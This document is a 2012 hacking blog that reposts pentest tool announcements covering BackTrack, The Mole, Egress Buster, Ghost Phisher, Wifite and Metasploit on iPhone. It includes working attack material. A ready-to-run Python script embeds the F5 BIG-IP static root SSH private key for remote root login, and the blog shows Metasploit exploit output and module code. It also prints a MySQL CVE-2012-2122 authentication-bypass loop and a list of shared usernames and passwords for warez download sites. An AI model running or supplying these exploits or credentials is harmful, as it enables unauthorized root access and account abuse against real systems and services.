Friday, November 16, 2012

Hack.me – Build, Host & Share Vulnerable Web Application Code

Hack.me is a FREE, community based project powered by eLearnSecurity. The community allows you to build, host and share vulnerable web application code for educational and research purposes.
It aims to be the largest collection of “runnable” vulnerable web applications, code samples and CMS’s online. The platform is available without any restriction to any party interested in Web Application Security: students, universities, researchers, penetration testers and web developers.


Features
  • Upload your own code
  • Online IDE for PHP & MySQL
  • Your code hosted in the cloud
  • FREE!!
  • Practice webapp security
  • Isolated enviroment
  • Online: nothing to download!
Safety
Every time you run a new Hackme the site will initiate a new sandbox for you. You will get isolated access to it so that you will always know that the application is safe for you to use. No other students can add malware or exploits in your sandbox. This ensures 99% safety.
What about the 1%? While the team makes the best effort to moderate every and each new web app uploaded on Hack.me, chances are that something can and will slip through. If you are not 100% comfortable to trust us or the Hackme developer, please just run new Hackmes from a virtual machine or from a non production OS.
We have written about a variety of web apps where you can practice your hack-fu such as:
you can try and feel it , up to you to decide the best:
https://hack.me/ 

Happy Hunting

Thursday, October 25, 2012

BackBox Linux 3.0 - penetration testing and forensic analysis tasks

Raffaele Forte has announced the release of BackBox Linux 3.0, a specialist Ubuntu-based live DVD designed for penetration testing and forensic analysis tasks: "The BackBox team is pleased to announce the major release of BackBox Linux, version 3.0. The major release include features such as Linux kernel 3.2 and Xfce 4.8. Apart from the system major upgrade, all auditing tools are up to date as well. What's new: system upgrade; bug corrections; performance boost; improved start menu; improved Wi-Fi drivers (compat-wireless aircrack patched); new and updated hacking tools. System requirements: 32-bit or 64-bit processor; 512 MB of system memory; 4.4 GB of disk space for installation; graphics card capable of 800x600 pixel resolution; DVD-ROM drive or USB port." Here is the brief release announcement.
 you can try download here:-

Download: backbox-3.0-i386.iso (1,099MB, MD5)
                  backbox-3.0-amd64.iso (1,100MB, MD5).


 

for more pictures click here http://www.backbox.org/gallery/backbox-linux-2

Sunday, September 30, 2012

CrowdRE – Crowdsourced Reverse Engineering Service From CrowdStrike

Reversing complex software quickly is challenging due to the lack of professional tools that support collaborative analysis. The CrowdRE project aims to fill this gap. Rather than using a live distribution of changes to all clients, which has proven to fail in the past, it leverages from the architecture that is being used with success to organize source code repositories: a system that manages a history of changesets as commit messages.

 There’s a great video here, which explains more about CrowdRE and how to get started:



The central component is a cloud based server that keeps track of commits in a database. Each commit covers one or more functions of an analyzed binary and contains information like annotations, comments, prototype, struct and enum definitions and the like. Clients can search the database for commits of functions by constructing a query of the analyzed binary’s hash and the function offset. Different concurring commits for a function are possible; in such cases it is up to the user to decide which commit is better.
This basic concept is sufficient for a collaborative workflow on a per-function basis for a shared binary. One exciting feature is a similarity hashing scheme that considers the basic block boundaries of a function. Each function is mapped on a similarity preserving hash of fixed size. A database query for such a functions similarity hash returns a set of functions sorted by their similarity value, and the analyst can choose amongst them. This is extremely helpful when analyzing variants based on the same code or generations of a malware family, for example.
The CrowdRE client is now freely available as an IDA Pro plugin. CrowdStrike maintains a central cloud for the community to share their commits amongst each other. It is our goal to help building a public database of known, well annotated functions to speed up the analysis of standard components, somewhat similar to what BinCrowd (which is offline nowadays) offered but with support for multiple co-existing commits for the same function. We also supports list-based commit visibility to give users control over who else can see and import their contributions.

You can check out the service here:
https://crowdre.crowdstrike.com/sign-in

Tuesday, September 4, 2012

Upgrade From BackTrack 5 R2 to BackTrack 5 R3

This is simple way to upgrade from BackTrack 5 R2 to BackTrack 5 R3:-

open your terminal and start typing the command:

1. apt-get update && apt-get dist-upgrade

With the dist-upgrade finished, all that remains is the install the new tools that have been added for R3. An important point to keep in mind is that there are slight differences between the 32-bit and 64-bit tools so make sure you choose the right one.

2.
32-bit install tools

apt-get install libcrafter blueranger dbd inundator intersect mercury cutycapt trixd00r artemisa rifiuti2 netgear-telnetenable jboss-autopwn deblaze sakis3g voiphoney apache-users phrasendrescher kautilya manglefizz rainbowcrack rainbowcrack-mt lynis-audit spooftooph wifihoney twofi truecrack uberharvest acccheck statsprocessor iphoneanalyzer jad javasnoop mitmproxy ewizard multimac netsniff-ng smbexec websploit dnmap johnny unix-privesc-check sslcaudit dhcpig intercepter-ng u3-pwn binwalk laudanum wifite tnscmd10g bluepot dotdotpwn subterfuge jigsaw urlcrazy creddump android-sdk apktool ded dex2jar droidbox smali termineter bbqsql htexploit smartphone-pentest-framework fern-wifi-cracker powersploit webhandler

64-bit install tools

apt-get install libcrafter blueranger dbd inundator intersect mercury cutycapt trixd00r rifiuti2 netgear-telnetenable jboss-autopwn deblaze sakis3g voiphoney apache-users phrasendrescher kautilya manglefizz rainbowcrack rainbowcrack-mt lynis-audit spooftooph wifihoney twofi truecrack acccheck statsprocessor iphoneanalyzer jad javasnoop mitmproxy ewizard multimac netsniff-ng smbexec websploit dnmap johnny unix-privesc-check sslcaudit dhcpig intercepter-ng u3-pwn binwalk laudanum wifite tnscmd10g bluepot dotdotpwn subterfuge jigsaw urlcrazy creddump android-sdk apktool ded dex2jar droidbox smali termineter multiforcer bbqsql htexploit smartphone-pentest-framework fern-wifi-cracker powersploit webhandler

That’s all there is to it! Once the new tools have been installed, you are up and running with BackTrack 5 R3. As always, if you come across any bugs or issues, please submit tickets via the BackTrack Redmine Tracker.

ok folks Happy hunting!!!

BackTrack 5 R3 adds tools for Arduino and Teensy attacks

The third release of version 5 of the BackTrack Linux security distribution fixes several bugs discovered since the R2 release in March and adds over 60 new tools. Several of the new tools were released as part of presentations at the recent Black Hat and DEFCON conferences. The distribution has also added a completely new category of software for "physical exploitation". This category includes libraries and an IDE for the Arduino and the Kautilya toolkit which provides payloads for the Teensy USB development board.
BackTrack can be run as a live CD for added security and flexibility or can be permanently installed on a system. The distribution is developed with security researchers and penetration testers in mind and offers one of the most comprehensive collections of Linux-based security software. Development of the distribution is sponsored by Offensive Security.
BackTrack 5 R3 is available with a choice of KDE and GNOME desktops for 32- and 64-bit machines and the project also provides a pre-built VMware image. ISO images can be downloaded directly from the distribution's mirrors or via BitTorrent. Information on how to install and use BackTrack is available from the project's wiki.

thanks to the H-Security for the news

BackTrack 5 R3 - Release

Hello there!! sorry because long time not update any new material in this blog, maybe not to late to tell the good news to all Backtrack lovers that the team has release the new Backtrack 5 R3 and ready to try..ok this is the story:-
------------------------------------------------------------------------------------------------------------


The time has come to refresh our security tool arsenal – BackTrack 5 R3 has been released. R3 focuses on bug-fixes as well as the addition of over 60 new tools – several of which were released in BlackHat and Defcon 2012. A whole new tool category was populated – “Physical Exploitation”, which now includes tools such as the Arduino IDE and libraries, as well as the Kautilya Teensy payload collection.
Building, testing and releasing a new BackTrack revision is never an easy task. Keeping up-to-date with all the latest tools, while balancing their requirements of dependencies, is akin to a magic show juggling act. Thankfully, active members of our redmine community such as backtracklover and JudasIscariot make our task that much easier by actively reporting bugs and suggesting new tools on a regular basis. Hats off to the both of you.

We would like to thank Offensive Security for providing the BackTrack dev team with the funding and resources to make all of this happen. Also, a very special thanks to dookie, our lead developer – for building, testing and packaging most of the new tools in this release.
Together with our usual KDE and GNOME, 32/64 bit ISOs, we have released a single VMware Image (Gnome, 32 bit). For those requiring other VM flavors of BackTrack – building your own VMWare image is easy – instructions can be found in the BackTrack Wiki.
Lastly, if you’re looking for intensive, real world, hands on Penetration Testing Training – make sure to drop by Offensive Security Training, and learn the meaning of “TRY HARDER“.
For the insanely impatient, you can download the BackTrack 5 R3 release via torrent right now. Direct ISO downloads will be available once all our HTTP mirrors have synched, which should take a couple more hours. Once this happens, we will update our BackTrack Download page with all links.

Saturday, July 14, 2012

Microsoft® EMET third-party GUI

Around this time last year I was working on a contract implementing a service running on a Microsoft® Embedded XP device that required a high level of security. Unfortunately I knew that Embedded XP did not have the SEHOP and ASLR protections of modern operating systems such as Windows® Vista and Microsoft Windows® 7. Because my service was communicating over the WAN it could potentially be vulnerable to zero-day exploits.

The Problem

    I really wanted to use the Enhanced Mitigation Experience Toolkit for providing SEHOP and pseudo-ASLR but unfortunately the EMET graphical interface was implemented with the .NET Framework. This imposed several problems; I had very limited drive space to work with... the operating system was installed on a 512 megabyte Secure Digital (SD) card. The operating system and other various tools consumed most of this space. Also because the device was designated as High-Security I did not want to increase the attack surface by installing the .NET framework. There have been many vulnerabilities found within the .NET framework over the last few years.

The Solution

    I began developing a custom graphical interface for the EMET package. But first there were a few hurdles I would need to overcome. The first problem I encountered was the archaic Application Compatibility Database engine that was being used. I began reverse engineering this beast and it appears to be similar to the old hash-bucket databases we used back in the old Unix days. Somewhat similar to the old ndbm, dbm and gdbm. The problem was that the AppHelp.dll that is distributed with Microsoft Windows® XP is missing many of the functions for creating and writing to the Application Compatibility Database.
    There were a few other issues such as figuring out how the mostly-undocumented Boot Configuration Data (BCD) store is implemented. On operating systems prior to Vista I could simply change a few registry keys and modify the boot.ini but to make my software future proof I would need to support the BCD. 


  I recently added the ability to install and configure EMET on ComputerA and export all of the settings and package all of the binaries into a redistributable package ready for installation on ComputerB. I also wanted to expose more of the EMET internals to the end-user such as heap pre-allocations.

Final Thoughts

    If you are interested in using the third-party graphical interface for the Enhanced Mitigation Experience Toolkit you may download it here.
Download: Native EMET graphical interface

MD5: B8FB870B831954EC6FB6580F72E4AF83
SHA1: 806E50C3A7BF38363E045BD1B5CA42351D40DB3B

    During my research I encountered some absolutely astonishing security issues related to the App Compat engine. I want to make a public call to other security researchers to focus some attention on this area.

thanks to the  David Delaune at www.scatternetwork.com

Tuesday, July 10, 2012

The Mole v0.3 – Automatic SQL Injection Exploitation Tool



The Mole is an automatic SQL Injection exploitation tool. Only by providing a vulnerable URL and a valid string on the site it can detect the injection and exploit it, either by using the union technique or a boolean query based technique.

 

 

Features

  • Support for injections using Mysql, SQL Server, Postgres and Oracle databases.
  • Command line interface. Different commands trigger different actions.
  • Auto-completion for commands, command arguments and database, table and columns names.
  • Support for filters, in order to bypass certain IPS/IDS rules using generic filters, and the possibility of creating new ones easily.
  • Exploits SQL Injections through GET/POST/Cookie parameters.
  • Developed in python 3.
  • Exploits SQL Injections that return binary data.
  • Powerful command interpreter to simplify its usage.
Disclaimer: Usage of The Mole for attacking web servers without mutual consent can be considered as an illegal activity. It is the final user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program.

download this tool here : Linux - Themole-0.3-lin-src.tar.gz
                                      Windows - Themole-0.3-win32.zip
for more info go here

Thursday, June 28, 2012

“Egress Buster” – Find outbound ports

A friend was recently on a penetration test and needed a port on the outside. I haven’t found any decent tools out there for finding what ports are allowed outbound to help with reverse shells and stuff like that so I wrote one real quick. Note that this was written in about 15 minutes and the code can absolutely be improved. I’ll probably go back and clean it up sometime. There are some limitations, for one, operating systems in general start to puke when you generate over a 1000 listeners, so you will need to test a 1000 at at time. Good news is the socket handlers are multi-threaded so you can cycle through about a 1000 ports in well under a minute. Here’s the general concept:
You are on the inside network somehow and need to find what ports are allowed out to the Internet. There’s two main files/components – egressbuster and egress_listener. Egressbuster connects out on whatever ports you specify and tries to connect to an Internet facing computer thats running egress_listener.
Very simple to run:
On victim:

egressbuster.exe  
example: egressbuster.exe 208.1.1.1 1-1000



In the above example, we specify a low port range and high port range, egressbuster will attempt to connect from port 1 to 1000 outbound to wherever the reverse_listener is.
The listener:

python egress_listener.py 
example: python egress_listener.py 1-1000


In the above example, we just specify what ranges we need to listen to. In the above example we listen from 1 to 1000 for incoming connections. When a connection is established, this is what you'll see on the listener side.

192.168.235.131 connected on port: 170
192.168.235.131 connected on port: 171
192.168.235.131 connected on port: 172
192.168.235.131 connected on port: 173
192.168.235.131 connected on port: 174
192.168.235.131 connected on port: 175
192.168.235.131 connected on port: 176
192.168.235.131 connected on port: 177
192.168.235.131 connected on port: 178

If your interested, download the byte compiled code and the python source here.

Press F5 for root shell

As HD mentioned, F5 has been inadvertently shipping a static ssh key that can be used to authenticate as root on many of their BigIP devices. Shortly after the advisory, an anonymous contributor hooked us up with the private key.

Getting down to business, here it is in action:

    18:42:35 0 exploit(f5_bigip_known_privkey) > exploit

    [+] Successful login
    [*] Found shell.
    [*] Command shell session 3 opened ([redacted]:52979 -> [redacted]:22) at 2012-06-22 18:42:43 -0600

    id; uname -a
    uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
    Linux [redacted] 2.4.21-10.0.1402.0smp #2 SMP Mon Feb 15 10:23:56 PST 2010 i686 athlon i386 GNU/Linux
    ^Z
    Background session 3? [y/N]  y

    18:42:35 1 exploit(f5_bigip_known_privkey) >

Of course, since it's just a regular ssh key, you can easily just drop it in a file and use a standard ssh client.

    ssh -i ~/.ssh/f5-bigip.priv root@8.8.8.8

The advantage of using Metasploit to exploit this weakness is in the session management and rapid post-exploitation capabilities that the framework offers.
This bug is also interesting in that it gave us a good test case for using static SSH credentials as an exploit module rather than auxiliary. The key difference between exploit and auxiliary modules is usually the need for a payload. If it needs a payload: exploit. Otherwise, it's auxiliary. In this case it's a little blurry, though, because it results in a session, which is typically an exploit trait. Some of our authentication bruteforce scanners get around this with some ruby acrobatics so they can still create a session despite not having a payload or a handler.

From a module developer perspective, this exploit has a few interesting aspects that you won't see elsewhere.
First, and probably most important, it doesn't upload a payload to the victim. The connection itself becomes a shell, so it doesn't need to but that presents a bit of a problem with the framework's design. Fortunately there is a payload for exactly this situation: cmd/unix/interact. This simple payload is different from most; all it does is shunt commands from the user straight to the socket and back. It uses a "find" handler similar to the way a findsock payload works. To tell the framework about the payload and handler this exploit will require, we need a block in the module info like so:

  1.     'Payload'     => {  
  2.       'Compat'  => {  
  3.         'PayloadType'    => 'cmd_interact',  
  4.         'ConnectionType' => 'find',  
  5.       },  
  6.     },  

Since there is really only one payload that works with this exploit, it also makes sense to set it by default:

  1.     'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },  

Next, it uses our modified Net::SSH library to connect to the victim. Most exploits will include Msf::Exploit::Remote::Tcp or one of its descendants; those related mixins all set up the options everyone is familiar with: RHOST, RPORT, etc. Since this one does not, we have to do it manually like so:

  1.     register_options(  
  2.       [  
  3.         # Since we don't include Tcp, we have to register this manually  
  4.         Opt::RHOST(),  
  5.         Opt::RPORT(22),  
  6.       ], self.class  

Lastly, because the handler is of type "find" we must call handler() to get a session. Most Remote::Tcp exploits don't have to do this if they are not compatible with "find" because the handler will spawn a session whenever a connection is made (either reverse or bind). However, all exploits that *are* compatible with "find" payloads must call handler() at some point. Normally there is a global socket created by the Tcp mixin when you call connect() but in this case it is necessary to let the handler know our socket is now a shell.

  1.     def exploit  
  2.       conn = do_login("root")  
  3.       if conn  
  4.         print_good "Successful login"  
  5.         handler(conn.lsock)  
  6.       end  
  7.     end  

This was a fun module to write. The devices it targets can be a goldmine for a pentester who likes packets since they're basically a giant packet sink that lets you read and modify traffic willy nilly. ARP spoofing is noisy and DNS poisoning is hard, let's just own the firewall.

Thursday, June 14, 2012

Stuxnet Review








Just for info maybe it's an old news but Stuxnet still threat all PC in the world especially in industrial.

Wednesday, June 13, 2012

Remote Root Authentication Bypass for F5 BIG-IP

Here’s a quick script written with the private key to bypass the root authentication login for F5′s Big-IP SSH login. Scan for a Big-IP and run this against it and you have root!


 Just copy the below code into a .py file, and run python .py. Enter the IPaddress and your done.

 CODE:


#!/usr/bin/python
#
# Title: F5 BIG-IP Remote Root Authentication Bypass Vulnerability (py)
#
# Quick script written by Dave Kennedy (ReL1K) for F5 authentication root bypass
# http://www.secmaniac.com
#
#
import subprocess,os

filewrite = file("priv.key", "w")
filewrite.write("""-----BEGIN RSA PRIVATE KEY-----
MIICWgIBAAKBgQC8iELmyRPPHIeJ//uLLfKHG4rr84HXeGM+quySiCRgWtxbw4rh
UlP7n4XHvB3ixAKdWfys2pqHD/Hqx9w4wMj9e+fjIpTi3xOdh/YylRWvid3Pf0vk
OzWftKLWbay5Q3FZsq/nwjz40yGW3YhOtpK5NTQ0bKZY5zz4s2L4wdd0uQIBIwKB
gBWL6mOEsc6G6uszMrDSDRbBUbSQ26OYuuKXMPrNuwOynNdJjDcCGDoDmkK2adDF
8auVQXLXJ5poOOeh0AZ8br2vnk3hZd9mnF+uyDB3PO/tqpXOrpzSyuITy5LJZBBv
7r7kqhyBs0vuSdL/D+i1DHYf0nv2Ps4aspoBVumuQid7AkEA+tD3RDashPmoQJvM
2oWS7PO6ljUVXszuhHdUOaFtx60ZOg0OVwnh+NBbbszGpsOwwEE+OqrKMTZjYg3s
37+x/wJBAMBtwmoi05hBsA4Cvac66T1Vdhie8qf5dwL2PdHfu6hbOifSX/xSPnVL
RTbwU9+h/t6BOYdWA0xr0cWcjy1U6UcCQQDBfKF9w8bqPO+CTE2SoY6ZiNHEVNX4
rLf/ycShfIfjLcMA5YAXQiNZisow5xznC/1hHGM0kmF2a8kCf8VcJio5AkBi9p5/
uiOtY5xe+hhkofRLbce05AfEGeVvPM9V/gi8+7eCMa209xjOm70yMnRHIBys8gBU
Ot0f/O+KM0JR0+WvAkAskPvTXevY5wkp5mYXMBlUqEd7R3vGBV/qp4BldW5l0N4G
LesWvIh6+moTbFuPRoQnGO2P6D7Q5sPPqgqyefZS
-----END RSA PRIVATE KEY-----""")
filewrite.close()

ipaddr=raw_input("Enter the IP address of the F5: ")
subprocess.Popen("ssh -i priv.key root@%s" % (ipaddr), shell=True).wait()

if os.path.isfile("priv.key"):
 os.remove("priv.key")
 
You are done.
 
TQ rel1k from SEC-MANIAC
 
Happy Hunting!! 

12 June 2012 | 1,163 views MySQL 1 Liner Hack Gives Root Access Without Password

MySQL 1 Liner Hack Gives Root Access Without Password

The latest news that has hit the streets is the occurence of the easiest hack ever, if you have local shell access (any user privelege level) and you can connect to MySQL – you can get root access to MySQL within a few seconds.
I tried this yesterday on one of my servers on Ubuntu 12.04 running the latest version of MySQL in the repo…and it worked in about 30 seconds. Scary really, you can use this single line of bash to hack MySQL:

while [ 1 ];do mysql -u root --password=123; done

Or the Python version I originally saw:

#!/usr/bin/python
import subprocess

while 1:
        subprocess.Popen("mysql -u root mysql --password=blah", shell=True).wait()


" Security experts have identified some 879,046 servers vulnerable to a brute force flaw that undermines password controls in MySQL and MariaDB systems.
According to Rapid7 security chief HD Moore, one in every 256 brute force attempts could override authentication controls on the servers and allow any password combination to be accepted. An attacker only needed to know a legitimate username which in most circumstances included the name ‘root’.
The flaw has already been exploited. Moore reported that the flaw (CVE-2012-2122) was already patched for both MySQL and MariaDB, but many MySQL administrators had not fixed the hole in their deployments.
Upon scanning 1.7 million publicly exposed MySQL servers, he found more than half (879,046) vulnerable to the “tragically comedic” flaw."
 
There’s a lot of vulnerable servers out there, so you better hope they aren’t yours because it’s not hard to scan whole subnets for servers with port 3306 open that accept connections from the outside world.
And if your server is in that state – it’s vulnerable. I just checked the repos for Ubuntu 10.04 LTS and Ubuntu 12.04 LTS and they both have a patched version of MySQL available for download so I suggest you get on your servers and do -

 aptitude update; aptitude safe-ugprade

 if you are using a shitty OS that uses yum or something – figure it out yourself.


"Affected versions, listed below, require for memcmp() to return an arbitrary integer outside of the range -128 to 127. All MariaDB and MySQL versions up to 5.1.61, 5.2.11, 5.3.5 and 5.5.22 were vulnerable, Golubchik said.
Moore and other security boffins identified vulnerable versions in Ubuntu 64-bit versions 10.04, 10.10, 11.04, 11.10, and 12.04, OpenSUSE 12.1 64-bit MySQL 5.5.23, and Fedora. Official builds of MariaDB and MySQL were safe, along with Red Hat Enterprise Linux 4, 5 and 6 and some flavours of Debian Linux and Gentoo 64 bit.
A list of accessible MySQL servers found 356,000 deployments running versions of 5.0.x, followed by 285,000 running 5.1.x, and 134,436 running 5.5.x. Another list of MySQL build flavours revealed 43,900 running Ubuntu, 6408 on Debian, and 98,665 on Windows."

Honestly I find that this is a really serious vulnerability, but has a pretty low risk profile. It will only work in cases of badly configured MySQL users where they accept connections from any IP address – user@% type entries in the user table.
NO ONE should be running root@% – so that would mean the attacker would need local shell access. And well if they have that, it’s pretty much game over anyway.

This vulnerability is notated as CVE-2012-2122.
Source: SC Magazine

TQ darknet.org.uk for this info

Tuesday, June 5, 2012

Ghos-Phisher GUI suite for phishing and penetration attacks

Ghost Phisher is a computer security application that comes inbuilt with a Fake DNS Server, Fake DHCP Server, Fake HTTP server and also has an integrated area for automatic capture and logging of HTTP form method credentials to a database. The program could be used as an honey pot,could be used to service DHCP request , DNS requests or phishing attack.

Ghost Phisher

New Version 1.4 

Ghost Phisher 1.4 includes the following new features
1. Inbuilt High speed RFC 2131 compliant DHCP Server
Requirements:
 
python
python-qt4
xterm
subversion
metasploit


To install simply run the following command in terminal after changing directory to the path were the downloaded package is:

root@host:~# dpkg -i ghost-phisher_1.3_all.deb
 
Icons and Running the application:
 
Software Icon can be found at the application Menu of the GNOME desktop interfaces
Icon can also be found at /usr/share/applications for KDE and also GNOME:
There you find "Ghost Phisher.desktop"

In BackTrack 5 R2 run it from /opt/Ghost-Phisher/ and start.

To get the source code for this project from SVN, here's the checkout link:
 
root@host:~# svn checkout http://ghost-phisher.googlecode.com/svn/Ghost-Phisher
 
Ghost Phisher Penetration Screenshots
 
Ghost phisher ships in with default Windows and Linux vulnerability pages, These pages can be used for penetration.Ghost automatically recognizes the remote operating system and displays the vulnerability pages according to the information fetched.



Payload Download

This screenshot displays windows machine penetrated upon payload execution using Metasploit


After the remote machines are exploited, Ghost automatically redirects the clients to the internet with the help of the alternate DNS settings and inbuilt cookie system.

Some More Screenshots:
You could Emulate WIFI access points for client redirections


Here shows client connected to fake access point


Heres the Fake-DNS tab; Notice the Fake-IP address specified


Here shows the victim supplied a fake lease by the DHCP


Here shows the victim gettings the fake resolved IP address:


Here shows our HTTP server, with a downloaded webpage intended to be faked:


Since our victim has our fake DHCP server address,therefore he gets directed to our fake http server:


Here shows our database area, which automatically captures and logs forms credentials


Check out his other project:
http://code.google.com/p/fern-wifi-cracker/
 
http://code.google.com/p/hexorbase/
Regards:
Saviour Emmanuel Ekiko

Saturday, June 2, 2012

Metasploit on IPhone 4S and IPad 2

With the recent Absinthe Jailbreak which opens up firmware 5.1.1 to Cydia, we once again tried to get Metasploit running on these iBabies. After a bit of fiddling around with various ruby package versions, its seems like the following combination works well with the latest version of Metasploit 4.4.0-dev (as of May 2012).
Of course, you need a jailbroken iPhone or iPad, with apt, OpenSSH server and a SSH client, such as iSSH. Once you are SSH’ed to your iPhone / iPad, run the following commands:

# Install basic tools
apt-get update
apt-get dist-upgrade
apt-get install wget subversion

# Download correct version of ruby and dependencies
wget http://ininjas.com/repo/debs/ruby_1.9.2-p180-1-1_iphoneos-arm.deb
wget http://ininjas.com/repo/debs/iconv_1.14-1_iphoneos-arm.deb
wget http://ininjas.com/repo/debs/zlib_1.2.3-1_iphoneos-arm.deb

# Install them
dpkg -i iconv_1.14-1_iphoneos-arm.deb
dpkg -i zlib_1.2.3-1_iphoneos-arm.deb
dpkg -i ruby_1.9.2-p180-1-1_iphoneos-arm.deb

# Delete them
rm -rf *.deb

# Go into /private var and svn checkout the msf trunk.
# Don't download the MSF tar.gz due to svn client versioning issues

cd /private/var
svn co https://www.metasploit.com/svn/framework3/trunk/ msf3
cd msf3/

# Check that Metasploit is running
ruby msfconsole
As no blog post is complete without a reverse shell screenshot, here’s a popped shell from the iPhone:


Info from Offensive-Security.com

Friday, May 25, 2012

Wifite + Reaver WPA/WPA2 crack in BackTrack 5 R2

wifite

An automated wireless attack tool.

What's New?

The biggest change from version 1 is support for "reaver", a Wifi-Protected Setup (WPS) attack tool. Reaver can compromise the PIN and PSK for many routers that have WPS enabled, usually within hours.
Other changes include a complete code re-write with bug fixes and added stability. Due to problems with the Python Tkinter suite, the GUI has been left out of this latest version.

About

Wifite is for Linux only.
Wifite was designed for use with pentesting distributions of Linux, such as Backtrack 5 R1, BlackBuntu, BackBox; any Linux distributions with wireless drivers patched for injection. The script appears to also operate with Ubuntu 11/10, Debian 6, and Fedora 16.
Wifite must be run as root. This is required by the suite of programs it uses. Running downloaded scripts as root is a bad idea. I recommend using the Backtrack 5 R1 bootable Live CD, a bootable USB stick (for persistent), or a virtual machine. Note that Virtual Machines cannot directly access hardware so a wireless USB dongle would be required.
Wifite assumes that you have a wireless card and the appropriate drivers that are patched for injection and promiscuous/monitor mode.

Execution

To download and execute wifite, run the commands below:
wget https://raw.github.com/derv82/wifite/master/wifite.py
chmod +x wifite.py
./wifite.py

Required Programs

Please see the installation guide on the wiki for help installing any of the tools below.
  • Python 2.6.x or 2.7.x. Wifite is a Python script and requires Python to run.
  • aircrack-ng suite. This is absolutely required. The specific programs used in the suite are:
    • airmon-ng,
    • airodump-ng,
    • aireplay-ng,
    • packetforge-ng, and
    • aircrack-ng.
  • Standard linux programs.
    • iwconfig, ifconfig, which, iw

Suggested Programs

* indicates program is not included in Backtrack 5 R1
  • *reaver, a Wifi-Protected Setup (WPS) attack tool. Reaver includes a scanner "walsh" (or "wash") for detecting WPS-enabled access points. Wifite uses Reaver to scan for and attack WPS-enabled routers.
  • *pyrit, a GPU cracker for WPA PSK keys. Wifite uses pyrit (if found) to detect handshakes. In the future, Wifite may include an option to crack WPA handshakes via pyrit.
  • tshark. Comes bundled with Wireshark, packet sniffing software.
  • cowpatty, a WPA PSK key cracker. Wifite uses cowpatty (if found) to detect handshakes.

Licensing

Wifite is licensed under the GNU General Public License version 2 (GNU GPL v2).
(C) 2011 Derv Merkler

i am testing the Wifite

starting up the wifite v2 BETA


Wifite in action using BT5 R2 and RTL8187 wireless adapter
                                   

see the result its take time 2 or 10 hour to gathering the pin
                                     

thanks to the BackTrack and derv82 for his nice job.....happy hunting!!

Sunday, April 22, 2012

Malaysia Open Source Conference 2012 (MOSC2012)

                                      
Date for MOSC2012 8th, 7th and 9th July 2012
Berjaya Time Square, Kuala Lumpur, Malaysia

Call For Speakers Is now open, click here.

Don't miss news about MOSC2012
Register Here - For Latest Update

Archive of the call for MOSC2012 speakers email :-


" Enterprising Open Source"

Call For Speakers Malaysia Open Source Conference 2012 (MOSC2012) 

Join MOSC2012 Facebook Page and Twitter for latest updates :-


Area of Interests :-

Technical topic can be :-


  • Cloud Computing and Virtualization
  • Social Media
  • Big Data
  • Big Storage
  • Business Intelligence
  • Enterprise Resource Management
  • Customer Relationship Management
  • Voice Over IP
  • Programming Language
  • Mobile Computing
  • Green Data Centre
  • Computer Security

Non technical can be :-

  • Policy
  • Case Study
  • Advocacy program
  • Patent and Trade Agreement
  • Open Source License in Enterprise Environment


With the theme "Enterprising Open Source", MOSC 2012 is set to explore the Open Source technology at the Enterprise level, and to promote the development of local Open Source solution for Enterprise environment to be use worldwide.



Call for speakers is open to all individual, organization, universities, companies and government agencies who is to present on the case study, development, implementation or applications. The working paper must be in knowledge sharing concept. The working paper must not contain marketing materials to promote certain product or company.



Please do note that the closing date for CFP is on April 30, 2012 and the selected paper will be informed after selection process is completed by the committee. For selected speakers you have to submit your presentation slide before June 15, 2012.


Prospective speakers are invited to submit an abstract in 100 - 200 words by using this online form below.

Username and Password List ......enjoy!

 www.unlimitedgamedownloads.com {movies, Pc Games, psp softwares}

Username : ga20me
Password : ke01feb

www.watchdirect.tv {movies, music, Pc Games, online Tv}

Username : cinemanetwork20
Password : butterfly20

www.fullreleasez.com {Greatly Every thing}

Username : Af872HskL
Password : XjsdH28N

www.fulldownloads.us {Greatly Every thing}

Username : Af872HskL
Password : XjsdH28N

www.pirateaccess.com {Every thing}

Username : a25bipZP
Password : 1TeVnoJb

www.warezquality.com {Every thing}

Username : ageg2020
Password : z8fsDfg3

wwww.warezreleases.com {All Stuff}

Username : HnRPxKQz
Password : a59KBV7

Username : a25bipZP
Password : 1TeVnoJb

Username : SHYyJfWU
Password : P4K20uO

www.fulldownloadaccess.com {All Stuff}

Username : mpuv3y
Password : umvpy3x

www.divxcrawler.com {download movies fastly}

Username : divx273
Password : 8342729

www.butterflydownloadnetwork.com {movies, music, Pc Games, Tv shows}

Username : cinemanetwork20
Password : butterfly20

www.downloadprofessional.com {movies,Pc softwares, Pc Games, Tv shows}

Username : lo886Ees
Password : zAgt88er

www.sharingzone.net {movies, Pc softwares, Pc Games}

Username : LODMQYHX
Password : 375021402
Receipt : 4T5W89RD
www.alphaload.com {All Stuff}

Username : AL3429352
Password : ykbcKTNS

Username : AL3429355
Password : RCHAbhKM

Username : AL3429350
Password : gMZNFcyS

Username : AL3429351
Password : cTAkWAxc

Username : AL3429352
Password : ykbcKTNS

www.gamedownloadnow.com {All Stuff}

Username : ga20me
Password : ke01feb

www.unlimiteddownloadcenter.com {All Stuff}

Username : cu20me
Password : ke01feb

www.tvadvanced.com {online Tv}

Username : mv03dl
Password : frmvdl

Tuesday, April 17, 2012

Multipsk Ham Radio Software from F6CTE

Modes supported by Multipsk:
  • Phase Shift Keying modes:
    • BPSK: BPSK31-63-125-250 / CHIP (64/128) / PSK10 / PSKFEC31 / PSKAM10-31-50
    • BPSK with SSTV: PSK63 F - PSK220F + DIGISSTV "Run"
    • QPSK: QPSK31-63-125-250
    • MPSK: MT63
    • PACKET BPSK1200-250-63-31 + APRS+ DIGISSTV "Run"
    • MIL-STD-188-110A - 4285
    • HFDL
  • On-Off Keying Modes: CW / CCW-OOK / CCW-FSK / QRSS
  • Frequency Shift Keying modes:
    • PACKET: 110-300-1200 bauds + APRS+ DIGISSTV "Run"
    • PACTOR 1 / AMTOR FEC-Navtex / AMTOR ARQ / SITOR A
    • ASCII / RTTY 45-50-75-100-110-150-200 / SYNOP + SHIP / IEC 870-5
    • 1382 / GMDSS DSC / ACARS (VHF) / DGPS / NWR SAME / ARQ-E / ARQ-E3
  • Multi Frequency Shift Keying modes:
    • MFSK8 / MFSK16 (+SSTV)
    • OLIVIA / Contestia / RTTYM / VOICE
    • THROB/THROBX
    • DominoF / DominoEX
    • PAX / PAX2
    • Automatic Link Establishment (see http://www.hflink.com) MIL-STD-188-141A+
      ARQ FAE / ALE400 + ARQ FAE
